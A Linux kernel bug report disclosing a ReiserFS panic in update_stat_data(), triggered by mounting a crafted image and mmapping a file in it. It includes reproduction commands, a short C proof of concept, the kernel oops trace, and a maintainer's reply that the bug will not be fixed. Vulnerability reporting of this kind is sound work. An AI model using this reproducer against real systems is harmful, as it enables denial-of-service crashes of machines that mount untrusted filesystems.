Bug 200361

Summary: Kernel panic in update_stat_data() when accessing a file on a reiserfs filesystem
Product: File System Reporter: Wen Xu (wen.xu)
Component: ReiserFSAssignee: ReiseFS developers team (reiserfs-devel)
Status: NEW ---    
Severity: normal CC: jeffm, wen.xu
Priority: P1    
Hardware: All   
OS: Linux   
Kernel Version: 4.18 Subsystem:
Regression: No Bisected commit-id:
Attachments: The (compressed) crafted image which causes crash

Description Wen Xu 2018-06-28 21:06:08 UTC 
Created attachment 277015 [details]
The (compressed) crafted image which causes crash

- Reproduce 
# mkdir mnt
# mount -t reiserfs -o acl,user_xattr 31.img mnt
# gcc -o poc poc.c
# ./poc ./mnt

- POC (poc.c)
    #define _GNU_SOURCE
    #include <sys/types.h>
    #include <sys/mount.h>
    #include <sys/mman.h>
    #include <sys/stat.h>
    #include <sys/xattr.h>

    #include <dirent.h>
    #include <errno.h>
    #include <error.h>
    #include <fcntl.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>

    #include <linux/falloc.h>
    #include <linux/loop.h>

  
    static void activity(char *mpoint) {

      char *foo_bar_baz;
      int err;

      static int buf[8192];
      memset(buf, 0, sizeof(buf));

      err = asprintf(&foo_bar_baz, "%s/foo/bar/baz", mpoint);

      int fd = open(foo_bar_baz, O_RDONLY, 0);
      if (fd >= 0) {
        void *mem = mmap(NULL, 4096, PROT_READ, MAP_PRIVATE | MAP_POPULATE, fd, 0);

        if (mem != MAP_FAILED)
          munmap(mem, 4096);

        close(fd);
      }
      
    }

    int main(int argc, char *argv[]) {
      activity(argv[1]);
      return 0;
    }

- Kernel message
[  949.720812] REISERFS (device loop0): found reiserfs format "3.6" with standard journal
[  949.720899] REISERFS (device loop0): using ordered data mode
[  949.720905] reiserfs: using flush barriers
[  949.724305] REISERFS (device loop0): journal params: device loop0, size 8192, journal first block 18, max trans len 1024, max batch 900, max commit age 30, max trans age 30
[  949.727088] REISERFS (device loop0): checking transaction log (loop0)
[  950.557910] REISERFS (device loop0): Using r5 hash to sort names
[  950.558231] REISERFS (device loop0): Created .reiserfs_priv - reserved for xattr storage.
[  967.052214] REISERFS panic (device loop0): vs-13065 update_stat_data: key [5 15 0x0 SD], found item *3.5*[5 15 0x0 IND], item_len 8, item_location 2972, free_space(entry_count) 0
[  967.052279] ------------[ cut here ]------------
[  967.052282] kernel BUG at fs/reiserfs/prints.c:369!
[  967.059616] invalid opcode: 0000 [#1] SMP KASAN PTI
[  967.060669] CPU: 0 PID: 1429 Comm: a.out Not tainted 4.18.0-rc1+ #8
[  967.061944] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
[  967.063902] RIP: 0010:__reiserfs_panic+0xe2/0x130
[  967.064864] Code: 48 89 da 48 c7 c1 20 11 94 a6 74 47 49 8d b4 24 d8 03 00 00 49 c7 c1 e0 21 9a a7 4d 89 e8 48 c7 c7 c0 12 94 a6 e8 62 a4 c7 ff <0f> 0b 48 85 db 48 89 de 48 c7 c2 20 11 94 a6 74 24 49 c7 c0 e0 21
[  967.068599] RSP: 0018:ffff8801efa77760 EFLAGS: 00010282
[  967.069671] RAX: 00000000000000a6 RBX: ffffffffa693af60 RCX: 0000000000000000
[  967.071092] RDX: 0000000000000000 RSI: 0000000000000008 RDI: ffffed003df4eee2
[  967.072513] RBP: ffff8801efa77810 R08: ffffed003edc4f21 R09: ffffed003edc4f21
[  967.073948] R10: 0000000000000001 R11: ffffed003edc4f20 R12: ffff8801ee98e600
[  967.075367] R13: ffffffffa693b980 R14: ffff8801cd360000 R15: ffff8801cd3601c8
[  967.076797] FS:  00007f88c4a10700(0000) GS:ffff8801f6e00000(0000) knlGS:0000000000000000
[  967.078394] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  967.079537] CR2: 00007f88c44c1760 CR3: 00000001f136c000 CR4: 00000000000006f0
[  967.080980] Call Trace:
[  967.081504]  ? reiserfs_debug+0x10/0x10
[  967.082289]  reiserfs_update_sd_size+0x44f/0x590
[  967.083227]  ? make_le_item_head+0x130/0x130
[  967.084133]  ? mutex_unlock+0x22/0x40
[  967.084903]  ? do_journal_begin_r+0x46c/0x6d0
[  967.085789]  ? journal_begin+0x10f/0x1e0
[  967.086585]  reiserfs_dirty_inode+0x149/0x160
[  967.087465]  ? reiserfs_dirty_inode+0x149/0x160
[  967.088383]  ? reiserfs_unfreeze+0x70/0x70
[  967.089254]  ? timespec64_trunc+0x5c/0x90
[  967.090072]  ? timespec64_trunc+0x5c/0x90
[  967.090902]  __mark_inode_dirty+0x220/0x4f0
[  967.091754]  ? timespec64_trunc+0x90/0x90
[  967.092571]  generic_update_time+0xd7/0x170
[  967.093435]  touch_atime+0x164/0x190
[  967.094169]  ? __atime_needs_update+0x360/0x360
[  967.095101]  ? kasan_kmalloc+0xad/0xe0
[  967.095891]  generic_file_mmap+0x80/0x90
[  967.096702]  mmap_region+0x5dc/0x8d0
[  967.097449]  do_mmap+0x543/0x790
[  967.098126]  vm_mmap_pgoff+0x182/0x1f0
[  967.098896]  ? vma_is_stack_for_current+0x60/0x60
[  967.099852]  ? putname+0x80/0x90
[  967.100518]  ? __fget+0xbe/0x110
[  967.101202]  ksys_mmap_pgoff+0x2a9/0x3a0
[  967.102011]  ? find_mergeable_anon_vma+0x60/0x60
[  967.102964]  ? filp_open+0x60/0x60
[  967.103666]  ? vm_brk+0x20/0x20
[  967.104338]  __x64_sys_mmap+0x94/0xb0
[  967.105115]  do_syscall_64+0x78/0x170
[  967.105868]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  967.106903] RIP: 0033:0x7f88c452c6ba
[  967.107631] Code: 89 f5 41 54 49 89 fc 55 53 74 35 49 63 e8 48 63 da 4d 89 f9 49 89 e8 4d 63 d6 48 89 da 4c 89 ee 4c 89 e7 b8 09 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 56 5b 5d 41 5c 41 5d 41 5e 41 5f c3 0f 1f 00
[  967.111428] RSP: 002b:00007ffdc414efb8 EFLAGS: 00000246 ORIG_RAX: 0000000000000009
[  967.112949] RAX: ffffffffffffffda RBX: 0000000000000001 RCX: 00007f88c452c6ba
[  967.114365] RDX: 0000000000000001 RSI: 0000000000001000 RDI: 0000000000000000
[  967.115783] RBP: 0000000000000003 R08: 0000000000000003 R09: 0000000000000000
[  967.117209] R10: 0000000000008002 R11: 0000000000000246 R12: 0000000000000000
[  967.118626] R13: 0000000000001000 R14: 0000000000008002 R15: 0000000000000000
[  967.120051] Modules linked in: snd_hda_codec_generic snd_hda_intel snd_hda_codec snd_hwdep snd_hda_core snd_pcm snd_timer snd mac_hid i2c_piix4 soundcore ib_iser rdma_cm iw_cm ib_cm ib_core iscsi_tcp libiscsi_tcp libiscsi scsi_transport_iscsi raid10 raid456 async_raid6_recov async_memcpy async_pq async_xor async_tx raid1 raid0 multipath linear 8139too qxl drm_kms_helper crct10dif_pclmul syscopyarea sysfillrect sysimgblt fb_sys_fops ttm crc32_pclmul aesni_intel drm aes_x86_64 crypto_simd cryptd glue_helper 8139cp mii pata_acpi floppy
[  967.129773] ---[ end trace 2e85051acb5f6dc1 ]---
[  967.130773] RIP: 0010:__reiserfs_panic+0xe2/0x130
[  967.131719] Code: 48 89 da 48 c7 c1 20 11 94 a6 74 47 49 8d b4 24 d8 03 00 00 49 c7 c1 e0 21 9a a7 4d 89 e8 48 c7 c7 c0 12 94 a6 e8 62 a4 c7 ff <0f> 0b 48 85 db 48 89 de 48 c7 c2 20 11 94 a6 74 24 49 c7 c0 e0 21
[  967.135581] RSP: 0018:ffff8801efa77760 EFLAGS: 00010282
[  967.136638] RAX: 00000000000000a6 RBX: ffffffffa693af60 RCX: 0000000000000000
[  967.138147] RDX: 0000000000000000 RSI: 0000000000000008 RDI: ffffed003df4eee2
[  967.139572] RBP: ffff8801efa77810 R08: ffffed003edc4f21 R09: ffffed003edc4f21
[  967.140988] R10: 0000000000000001 R11: ffffed003edc4f20 R12: ffff8801ee98e600
[  967.142435] R13: ffffffffa693b980 R14: ffff8801cd360000 R15: ffff8801cd3601c8
[  967.143851] FS:  00007f88c4a10700(0000) GS:ffff8801f6e00000(0000) knlGS:0000000000000000
[  967.145453] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  967.146642] CR2: 00007f88c44c1760 CR3: 00000001f136c000 CR4: 00000000000006f0

- Location
https://elixir.bootlin.com/linux/v4.18-rc1/source/fs/reiserfs/inode.c#L1434
	if (!is_statdata_le_ih(ih))
		reiserfs_panic(inode->i_sb, "vs-13065", "key %k, found item %h",
			       INODE_PKEY(inode), ih);

Reported by Wen Xu (wen.xu@gatech.edu) from SSLab at Gatech.
Comment 1 Jeff Mahoney 2018-07-18 21:17:20 UTC 
This is a panic due to reiserfs not having real error handling.  As reiserfs is in maintenance mode, this class is not on anyone's roadmap for fixing.